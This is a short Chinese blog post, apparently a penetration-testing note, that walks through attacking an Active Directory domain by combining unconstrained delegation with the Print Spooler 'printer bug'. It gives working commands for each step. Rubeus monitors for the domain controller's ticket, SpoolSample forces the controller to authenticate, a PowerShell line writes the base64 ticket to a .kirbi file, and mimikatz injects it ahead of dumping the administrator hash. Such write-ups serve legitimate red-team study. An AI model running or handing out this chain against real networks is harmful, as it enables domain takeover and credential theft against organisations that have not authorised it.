非约束委派+打印机
环境
域控:192.168.110.12 主机名:SYNC-DC
域内主机:192.168.1.101 主机名:mrhonest-pc
条件:
+ 获取到设置了非约束委派的主机system权限
利用方法
-
每秒监听来自域控主机(sync-dc$)的登录请求 现在是system权限
Rubeus.exe monitor /interval:1 /filteruser:SYNC-DC$
-
强制域控打印机回连,需在域用户进程上执行(我这里切换一下帐号),或者有域用户的帐号密码
实际中可以这样,cs上注入一个普通进程上执行,或者使用runas等工具执行
SpoolSample.exe SYNC-DC mrhonest-pc
-
收到票据
-
转换票据
[IO.File]::WriteAllBytes("绝对路径\TGS\ticket.kirbi", [Convert]::FromBase64String("得到的base64"))
-
先清空自身票据 然后导入生成的票据
-
注入票据
kerberos::ptt ticket.kirbi
-
dump admin的hash`
分类:
内网渗透
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 地球OL攻略 —— 某应届生求职总结
· 提示词工程——AI应用必不可少的技术
· Open-Sora 2.0 重磅开源!
· 周边上新:园子的第一款马克杯温暖上架